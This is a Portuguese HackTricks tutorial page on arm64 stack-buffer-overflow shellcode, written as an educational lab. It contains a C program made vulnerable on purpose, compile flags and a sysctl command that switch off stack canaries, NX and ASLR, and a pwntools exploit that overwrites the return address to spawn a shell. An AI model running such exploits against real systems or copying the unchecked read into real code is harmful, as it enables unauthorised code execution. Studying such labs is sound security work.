hacktricks/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md

Shellcode de Pilha - arm64

Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras maneiras de apoiar o HackTricks:

• Se você deseja ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF Verifique os PLANOS DE ASSINATURA!
• Adquira o swag oficial PEASS & HackTricks
• Descubra A Família PEASS, nossa coleção exclusiva de NFTs
• Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-nos no Twitter 🐦 @hacktricks_live.
• Compartilhe seus truques de hacking enviando PRs para os HackTricks e HackTricks Cloud repositórios do github.

Encontre uma introdução ao arm64 em:

{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %} arm64-basic-assembly.md {% endcontent-ref %}

Código

#include <stdio.h>
#include <unistd.h>

void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}

int main() {
vulnerable_function();
return 0;
}

Compile sem pie, canary e nx:

{% code overflow="wrap" %}

clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack

{% endcode %}

Sem ASLR & Sem canary - Estouro de pilha

Para desativar o ASLR, execute:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Para obter o deslocamento do bof, verifique este link.

Exploit:

from pwn import *

# Load the binary
binary_name = './bof'
elf = context.binary = ELF(binary_name)

# Generate shellcode
shellcode = asm(shellcraft.sh())

# Start the process
p = process(binary_name)

# Offset to return address
offset = 72

# Address in the stack after the return address
ret_address = p64(0xfffffffff1a0)

# Craft the payload
payload = b'A' * offset + ret_address + shellcode

print("Payload length: "+ str(len(payload)))

# Send the payload
p.send(payload)

# Drop to an interactive session
p.interactive()

A única coisa "complicada" de encontrar aqui seria o endereço na pilha para chamar. No meu caso, gerei o exploit com o endereço encontrado usando o gdb, mas depois, ao explorá-lo, não funcionou (porque o endereço da pilha mudou um pouco).

Abri o arquivo core gerado (gdb ./bog ./core) e verifiquei o endereço real do início do shellcode.